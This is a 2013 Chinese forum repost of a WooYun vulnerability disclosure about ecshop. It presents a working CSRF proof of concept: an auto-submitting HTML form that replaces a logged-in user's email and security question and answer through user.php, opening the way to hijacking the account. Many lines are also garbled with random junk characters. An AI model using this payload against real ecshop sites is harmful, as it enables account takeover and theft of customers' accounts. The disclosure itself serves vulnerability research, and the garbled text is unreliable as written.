找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1929|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
, k; O: G, w! f; x7 ?; F$ Y* A4 n  @ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
/ Y$ W3 m! P0 d# H
/ B' `1 r1 ^; @  KDemo For:http://www.wooyun.org/bug.php?action=view&id=395
; @2 ?& |  l4 l/ q8 ~4 i+ d8 M& C; f2 ~' }8 b. w$ ^8 e; b
详细说明:
% g( I8 W* n8 k& Y利用csrf和xss可以突破官方所说的“障碍”
/ X. D" O1 l; y& X* k' m( I& oxss版本已经有人说明
% K( _( {. Y# \4 L4 ]9 o2 Y这里给出csrf版本. X$ ?; g+ h3 |/ B% F2 ]  e

. ~: D' I, L' }3 G漏洞证明:7 p) l/ F$ q* b3 l' F4 @3 c
<html>! ^2 J( p! `0 ]" ~
<body>2 E. o. C" f; h' {; [8 i) v
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
5 W+ o+ K! m7 @  a; o6 x4 M$ }<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">8 m' W! Q1 y/ L  _) {! {6 o5 B
<INPUT TYPE="text" NAME="act" value="act_edit_profile">0 _, `$ B' b- z2 d  G& p
<INPUT TYPE="text" NAME="sel_question" value="ecshop">2 M) o* m5 l( q/ [2 O
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
" g3 S; j! t. U, X1 v</body>
5 {/ k0 h& R1 d4 e' f( ~2 ]<script>
; m9 s' x' w7 h* W. O% _7 g7 hdocument.forms[0].submit();
: a5 Z' _; M8 P) ]* B</script>
9 F* v9 U) N/ P</html>
* q% l3 x. Y' \% t1 w1 A, ^+ {构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
; h9 O/ p6 `8 P+ C# L
" ^: u6 S4 d8 k9 y8 T7 [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表